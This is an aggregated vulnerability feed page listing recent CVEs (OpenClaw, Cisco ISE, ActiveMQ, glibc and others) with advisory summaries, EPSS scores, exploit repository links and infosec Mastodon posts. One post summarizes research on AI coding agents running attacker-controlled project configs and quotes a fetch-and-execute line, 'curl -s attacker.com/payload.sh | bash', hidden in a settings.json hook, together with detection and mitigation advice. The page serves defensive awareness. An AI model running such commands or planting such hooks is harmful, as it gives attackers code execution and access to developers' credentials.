EPSS: 0.02%

updated 2026-04-28T18:21:09

1 posts

## Summary Plivo V3 signature verification canonicalized query ordering, but replay detection hashed the raw verification URL. Reordering query parameters preserved a valid signature while producing a fresh replay-cache key. ## Impact An attacker who captured one valid signed Plivo V3 webhook could replay the same event by permuting query parameters and trigger duplicate voice-call processing.

thehackerwire@mastodon.social at 2026-04-28T22:00:12.000Z ##

🟠 CVE-2026-41395 - High (7.5)

OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41387
(9.7 CRITICAL)

EPSS: 0.02%

updated 2026-04-28T18:18:46

1 posts

## Summary Host exec env override sanitization did not fail closed for several package-manager and related redirect variables that can steer dependency fetches or startup behavior. ## Impact An approved exec request could silently redirect package resolution or runtime bootstrap to attacker-controlled infrastructure and execute trojanized content. ## Affected Component `src/infra/host-env-sec

thehackerwire@mastodon.social at 2026-04-28T22:31:12.000Z ##

🟠 CVE-2026-41387 - High (7.8)

OpenClaw before 2026.3.22 contains an incomplete host environment variable sanitization vulnerability in host-env-security-policy.json and host-env-security.ts that allows package-manager environment overrides. Attackers can exploit approved exec ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41386(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-04-28T18:18:23

1 posts

## Summary Bootstrap setup codes were not bound to the intended device role and scopes, allowing first-use privilege escalation during pairing. ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real first-use bootstrap privilege-escalation bug fixed and shipped in v2026.3.22+, so keep open for publication with current severity. ## Affected Packages / Versions

thehackerwire@mastodon.social at 2026-04-28T22:30:45.000Z ##

🔴 CVE-2026-41386 - Critical (9.1)

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bootstrap setup codes are not bound to intended device roles and scopes during pairing. Attackers can exploit this during first-use device pairing to escalate privileges...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41378(CVSS UNKNOWN)

EPSS: 0.18%

updated 2026-04-28T18:15:32

1 posts

## Summary Paired node escalates to gateway RCE via unrestricted node.event agent dispatch ## Current Maintainer Triage - Status: narrow - Normalized severity: high - Assessment: v2026.3.28 still lets paired role=node clients drive node.event agent.request into broader gateway-side tool access than node RPCs, but critical is overstated because a trusted paired node foothold is already required.

thehackerwire@mastodon.social at 2026-04-28T22:31:31.000Z ##

🟠 CVE-2026-41378 - High (8.8)

OpenClaw before 2026.3.31 contains a privilege escalation vulnerability allowing paired nodes with role=node to dispatch node.event agent requests with unrestricted gateway-side tool access. Attackers with trusted paired node credentials can escal...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41602
(7.5 HIGH)

EPSS: 0.13%

updated 2026-04-28T15:31:54

1 posts

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

thehackerwire@mastodon.social at 2026-04-29T01:00:17.000Z ##

🟠 CVE-2026-41602 - High (7.5)

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation

This issue affects Apache Thrift: before 0.23.0.

Users are recommended to upgrade to version 0.23.0, which fixes the issue.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27760
(8.1 HIGH)

EPSS: 0.10%

updated 2026-04-28T15:30:58

1 posts

OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter. Attackers can break out of the define() string context in config.php using a single quote and statement separator to inject malicious PHP code that pers

thehackerwire@mastodon.social at 2026-04-29T00:15:45.000Z ##

🟠 CVE-2026-27760 - High (8.1)

OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5944
(8.2 HIGH)

EPSS: 0.09%

updated 2026-04-28T15:30:52

1 posts

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment environment without authentication. An unauthenticated attacker with network access can exploit this vulnerability by sending crafted requests to the expo

thehackerwire@mastodon.social at 2026-04-29T00:16:05.000Z ##

🟠 CVE-2026-5944 - High (8.2)

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment envi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3323
(7.5 HIGH)

EPSS: 0.01%

updated 2026-04-28T12:31:36

1 posts

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

thehackerwire@mastodon.social at 2026-04-29T00:59:57.000Z ##

🟠 CVE-2026-3323 - High (7.5)

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35431
(10.0 CRITICAL)

EPSS: 0.09%

updated 2026-04-28T12:10:53.103000

1 posts

Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management allows an unauthorized attacker to perform spoofing over a network.

beyondmachines1@infosec.exchange at 2026-04-28T16:01:29.000Z ##

Microsoft Patches Critical CVSS 10.0 SSRF Vulnerability in Entra ID

Microsoft patched a critical SSRF vulnerability (CVE-2026-35431) in Entra ID Entitlement Management with a CVSS score of 10.0 that allowed unauthenticated spoofing and internal network access. The flaw was fixed server-side, requiring no action from users to secure their environments.

**No action is needed on your part, Microsoft already fixed this vulnerability on their cloud servers on April 23, 2026. As a good practice, review your Entra ID sign-in and audit logs for any unusual activity from before that date, and ensure multi-factor authentication is enforced for all admin accounts.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-5450
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-23T15:33:34.277000

1 posts

Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow.

vitobotta@mastodon.social at 2026-04-28T15:01:12.000Z ##

Three glibc CVEs, including CVSS 9.8 heap overflow in scanf (CVE-2026-5450). Affects glibc 2.7 through 2.43, that's decades of releases. When the C library has bugs, everything on Linux has bugs. Patch.

##

CVE-2026-3844
(9.8 CRITICAL)

EPSS: 0.08%

updated 2026-04-23T04:00:28

1 posts

The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'fetch_gravatar_from_remote' function in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability can only be exploited

Nuclei template

5 repos

https://github.com/0xgh057r3c0n/CVE-2026-3844

https://github.com/halilkirazkaya/CVE-2026-3844

https://github.com/dinosn/CVE-2026-3844

https://github.com/tausifzaman/CVE-2026-3844

https://github.com/im-hanzou/CVE-2026-3844

CVE-2026-5588
(0 None)

EPSS: 0.01%

updated 2026-04-21T16:16:20.540000

1 posts

Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcpkix on all (pkix modules), Legion of the Bouncy Castle Inc. BCPKIX-FIPS bcpkix on All (pkix modules). This vulnerability is associated with program files JcaContentVerifierProviderBuilder.Java. This issue affects BC-JAVA: from 1.67 before 1.84; BCPKIX-FIPS: from 2.0.6 before 2.0.11, from

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2026-33626
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-21T15:04:13

1 posts

## Summary A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. ## Affected Versions - **Tested on:** main branch (2026-02-04) -

CVE-2026-20147
(9.9 CRITICAL)

EPSS: 0.28%

updated 2026-04-17T15:09:46.880000

1 posts

A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sen

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-61260
(9.8 CRITICAL)

EPSS: 0.10%

updated 2026-04-16T22:56:43

1 posts

A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enables code execution through malicious MCP (Model Context Protocol) configuration files. The attack is triggered when a user runs the codex command inside a malicious or compromised repository. Codex automatically loads project-local .env and .codex/config.toml files without requiring user confirmation, allowing attackers

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

CVE-2026-34197
(8.8 HIGH)

EPSS: 65.07%

updated 2026-04-16T21:49:17

1 posts

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) a

Nuclei template

9 repos

https://github.com/dinosn/CVE-2026-34197

https://github.com/0xBlackash/CVE-2026-34197

https://github.com/AtoposX-J/CVE-2026-34197-Apache-ActiveMQ-RCE

https://github.com/DEVSECURITYSPRO/CVE-2026-34197

https://github.com/xshysjhq/CVE-2026-34197-payload-Apache-ActiveMQ-

https://github.com/keraattin/CVE-2026-34197

https://github.com/hg0434hongzh0/CVE-2026-34197

https://github.com/KONDORDEVSECURITYCORP/CVE-2026-34197

https://github.com/Catherines77/ActiveMQ-EXPtools

spinscale@mastodon.social at 2026-04-29T12:56:01.000Z ##

Remote Code Execution in Apache ActiveMQ

"By calling addNetworkConnector through Jolokia with a crafted URI, an attacker can chain these mechanisms together to force the broker to fetch and execute a remote Spring XML configuration file"

horizon3.ai/attack-research/di

##

CVE-2026-20148
(4.9 MEDIUM)

EPSS: 0.06%

updated 2026-04-15T18:32:03

1 posts

A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to perform path traversal attacks on the underlying operating system and read arbitrary files. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by se

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2026-26157
(7.0 HIGH)

EPSS: 0.01%

updated 2026-04-15T00:35:42.020000

1 posts

A flaw was found in BusyBox. Incomplete path sanitization in its archive extraction utilities allows an attacker to craft malicious archives that when extracted, and under specific conditions, may write to files outside the intended directory. This can lead to arbitrary file overwrite, potentially enabling code execution through the modification of sensitive system files.

exploitdb_bot@mastodon.social at 2026-04-30T08:31:13.000Z ##

🚨 New Exploit: BusyBox 1.37.0 - Path Traversal
📋 CVE: CVE-2026-26157
👤 Author: Calil Khalil

🔗 exploit-db.com/exploits/52538

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-26157

##

CVE-2025-46811
(9.8 CRITICAL)

EPSS: 0.10%

updated 2026-04-15T00:35:42.020000

1 posts

A Missing Authorization vulnerability in SUSE Linux Manager allows anyone with the ability to connect to port 443 of SUSE Manager is able to run any command as root on any client. This issue affects Container suse/manager/5.0/x86_64/server:5.0.5.7.30.1: from ? before 5.0.27-150600.3.33.1; Image SLES15-SP4-Manager-Server-4-3-BYOS: from ? before 4.3.87-150400.3.110.2; Image SLES15-SP4-Manager-Server

1 repos

https://github.com/b-L-x/CVE-2025-46811

exploitdb_bot@mastodon.social at 2026-04-30T07:21:05.000Z ##

🚨 New Exploit: SUSE Manager 4.3.15 - Code Execution
📋 CVE: CVE-2025-46811
👤 Author: wjmaj98

🔗 exploit-db.com/exploits/52527

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-46811

##

CVE-2026-35414
(4.2 MEDIUM)

EPSS: 0.02%

updated 2026-04-10T19:36:57.163000

1 posts

OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon scenarios involving a principals list in conjunction with a Certificate Authority that makes certain use of comma characters.

2 repos

https://github.com/killercd/CVE-2026-35414

https://github.com/dehobbs/cve_2026_35414

chrispy@chaos.social at 2026-04-28T15:51:14.000Z ##

@kubikpixel Behoben wurde die Schwachstelle bereits Anfang April mit der Veröffentlichung von OpenSSH 10.3

Detail Description :
nvd.nist.gov/vuln/detail/CVE-2
(mW ein weiterhin funktionierender und gemeinnütziger Service der Regierung der United States :awesome: )

##

CVE-2025-8065
(6.5 MEDIUM)

EPSS: 0.08%

updated 2026-04-03T18:31:04

2 posts

A buffer overflow vulnerability exists in the ONVIF XML parser of Tapo C200 V3. An unauthenticated attacker on the same local network segment can send specially crafted SOAP XML requests, causing memory overflow and device crash, resulting in denial-of-service (DoS).

CVE-2026-25047(CVSS UNKNOWN)

EPSS: 0.02%

updated 2026-02-27T20:45:41

1 posts

### Summary A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8. ### Details The vulnerability resides in the `add()` function and `indexer()` function implemented within `deepHas.js`. Although version 1.0.7 attempts to prevent prototype pollution by checking property

1 repos

https://github.com/mbanyamer/deephas-1.0.7-Prototype-Pollution-PoC-CVE-2026-25047-

exploitdb_bot@mastodon.social at 2026-04-30T07:21:09.000Z ##

🚨 New Exploit: deephas 1.0.7 - Prototype Pollution
📋 CVE: CVE-2026-25047
👤 Author: banyamer

🔗 exploit-db.com/exploits/52528

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25047

##

CVE-2026-26335
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-02-26T22:45:37.080000

1 posts

Calero VeraSMART versions prior to 2022 R1 use static ASP.NET/IIS machineKey values configured for the VeraSMART web application and stored in C:\\Program Files (x86)\\Veramark\\VeraSMART\\WebRoot\\web.config. An attacker who obtains these keys can craft a valid ASP.NET ViewState payload that passes integrity validation and is accepted by the application, resulting in server-side deserialization a

1 repos

https://github.com/mbanyamer/CVE-2026-26335-Calero-VeraSMART-RCE

exploitdb_bot@mastodon.social at 2026-04-30T09:51:05.000Z ##

🚨 New Exploit: Repetier-Server 1.4.10 - Path Traversal
📋 CVE: CVE-2026-26335
👤 Author: banyamer

🔗 exploit-db.com/exploits/52540

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-26335

##

CVE-2025-69985
(9.8 CRITICAL)

EPSS: 0.92%

updated 2026-02-26T19:39:20.677000

1 posts

FUXA 1.2.8 and prior contains an Authentication Bypass vulnerability leading to Remote Code Execution (RCE). The vulnerability exists in the server/api/jwt-helper.js middleware, which improperly trusts the HTTP "Referer" header to validate internal requests. A remote unauthenticated attacker can bypass JWT authentication by spoofing the Referer header to match the server's host. Successful exploit

2 repos

https://github.com/joshuavanderpoll/CVE-2025-69985

https://github.com/tianarsamm/CVE-2025-69985

exploitdb_bot@mastodon.social at 2026-04-30T10:31:05.000Z ##

🚨 New Exploit: FUXA 1.2.8 - Authentication Bypass + RCE Exploit
📋 CVE: CVE-2025-69985
👤 Author: joshua

🔗 exploit-db.com/exploits/52544

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-69985

##

exploitdb_bot@mastodon.social at 2026-04-30T09:51:11.000Z ##

🚨 New Exploit: Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap
📋 CVE: CVE-2026-2441
👤 Author: nu11secur1ty

🔗 exploit-db.com/exploits/52542

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-2441

##

CVE-2026-25961
(7.5 HIGH)

EPSS: 0.03%

updated 2026-02-20T20:22:32.817000

1 posts

SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, SumatraPDF's update mechanism disables TLS hostname verification (INTERNET_FLAG_IGNORE_CERT_CN_INVALID) and executes installers without signature checks. A network attacker with any valid TLS certificate (e.g., Let's Encrypt) can intercept the update check request, inject a malicious installer URL, and achieve arbitrary code

1 repos

https://github.com/mbanyamer/CVE-2026-25961-SumatraPDF-3.5.0---3.5.2-RCE

exploitdb_bot@mastodon.social at 2026-04-30T08:16:12.000Z ##

🚨 New Exploit: SumatraPDF 3.5.2 - Remote Code Execution
📋 CVE: CVE-2026-25961
👤 Author: banyamer

🔗 exploit-db.com/exploits/52535

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25961

##

CVE-2026-26235
(7.5 HIGH)

EPSS: 0.40%

updated 2026-02-20T19:52:03.777000

1 posts

JUNG Smart Visu Server 1.1.1050 contains a denial of service vulnerability that allows unauthenticated attackers to remotely shutdown or reboot the server. Attackers can send a single POST request to trigger the server reboot without requiring any authentication.

1 repos

https://github.com/mbanyamer/CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown

exploitdb_bot@mastodon.social at 2026-04-30T08:31:06.000Z ##

🚨 New Exploit: JUNG Smart Visu Server 1.1.1050 - Dos
📋 CVE: CVE-2026-26235
👤 Author: banyamer

🔗 exploit-db.com/exploits/52536

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-26235

##

CVE-2026-24486
(8.6 HIGH)

EPSS: 0.03%

updated 2026-02-17T20:44:50.210000

1 posts

Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename. Users should upgrade to version 0.0.22 to receive a patch or, as a workar

exploitdb_bot@mastodon.social at 2026-04-30T10:01:06.000Z ##

🚨 New Exploit: Python-Multipart 0.0.22 - Path Traversal
📋 CVE: CVE-2026-24486
👤 Author: jefersoncardoso.dev

🔗 exploit-db.com/exploits/52543

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-24486

##

steelefortress at 2026-04-30T11:00:11.778Z ##

CISA just added CVE-2025-24054 to its Known Exploited Vulnerabilities catalog, mandating federal agencies patch Windows systems against an NTLM hash-leaking flaw already weaponized in the wild.

Read more: steelefortress.com/6o7x90

CyberDefense

##

steelefortress@infosec.exchange at 2026-04-30T11:00:11.000Z ##

CISA just added CVE-2025-24054 to its Known Exploited Vulnerabilities catalog, mandating federal agencies patch Windows systems against an NTLM hash-leaking flaw already weaponized in the wild.

Read more: steelefortress.com/6o7x90

CyberDefense #InfoSec #Encryption #DataPrivacy #Privacy

##

CVE-2026-21248
(7.3 HIGH)

EPSS: 0.03%

updated 2026-02-11T20:15:17.870000

1 posts

Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.

exploitdb_bot@mastodon.social at 2026-04-30T08:31:10.000Z ##

🚨 New Exploit: Windows 11 25H2 - Heap Overflow
📋 CVE: CVE-2026-21248
👤 Author: nu11secur1ty

🔗 exploit-db.com/exploits/52537

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-21248

##

CVE-2026-25732
(7.5 HIGH)

EPSS: 0.08%

updated 2026-02-07T00:31:59

1 posts

### Summary NiceGUI's `FileUpload.name` property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern `UPLOAD_DIR / file.name`. Malicious filenames containing `../` sequences allow attackers to write files outside intended directories, with potential for remote code execution through application file overwrites in vulnerable deploy

1 repos

https://github.com/mbanyamer/CVE-2026-25732-NiceGUI-3.6.1

exploitdb_bot@mastodon.social at 2026-04-30T08:16:09.000Z ##

🚨 New Exploit: NiceGUI 3.6.1 - Path Traversal
📋 CVE: CVE-2026-25732
👤 Author: banyamer

🔗 exploit-db.com/exploits/52534

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25732

##

CVE-2025-12383(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-02-05T15:43:37

1 posts

In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignoring of critical SSL configurations - such as mutual authentication, custom key/trust stores, and other security settings. This issue may result in SSLHandshakeException under normal circumstances, but under certain conditions, it could lead to unauthorized trust in insecure servers (see PoC)

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2026-25130
(9.7 CRITICAL)

EPSS: 0.04%

updated 2026-01-31T03:53:47

1 posts

## Summary The CAI (Cybersecurity AI) framework contains multiple argument injection vulnerabilities in its function tools. User-controlled input is passed directly to shell commands via `subprocess.Popen()` with `shell=True`, allowing attackers to execute arbitrary commands on the host system. ## Vulnerable Component **Function:** `find_file()` in `src/cai/tools/reconnaissance/filesystem.py`

1 repos

https://github.com/mbanyamer/CVE-2026-25130-Cybersecurity-AI-CAI-Framework-0.5.10

exploitdb_bot@mastodon.social at 2026-04-30T07:31:06.000Z ##

🚨 New Exploit: Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection
📋 CVE: CVE-2026-25130
👤 Author: banyamer

🔗 exploit-db.com/exploits/52530

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25130

##

CVE-2025-68705(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-01-07T21:34:38

1 posts

# RustFS Path Traversal Vulnerability ## Vulnerability Details - **CVE ID**: - **Severity**: Critical (CVSS estimated 9.9) - **Impact**: Arbitrary File Read/Write - **Component**: `/rustfs/rpc/read_file_stream` endpoint - **Root Cause**: Insufficient path validation in `crates/ecstore/src/disk/local.rs:1791` ### Vulnerable Code ```rust // local.rs:1791 - No path sanitization! let file_path =

1 repos

https://github.com/imjdl/CVE-2025-68705

Zardus@defcon.social at 2026-04-28T15:45:11.000Z ##

@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.

First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.

The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.

This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (newsletter.semianalysis.com/p/), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).

The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as dpc.pw/posts/i-dont-want-your-), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 cs.fsu.edu/~whalley/papers/tec). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.

Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!

Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).

Thanks again for taking the time to write your thoughts down; looking forward to more discussion!

##

CVE-2025-68161(CVSS UNKNOWN)

EPSS: 0.03%

updated 2025-12-19T22:08:03

1 posts

The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the [verifyHostName](https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName) configuration attribute or the [log4j2.sslVerifyHostName](https://logging.apache.org/log4j/2.x/manual/systemproperties

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-48924
(6.5 MEDIUM)

EPSS: 0.04%

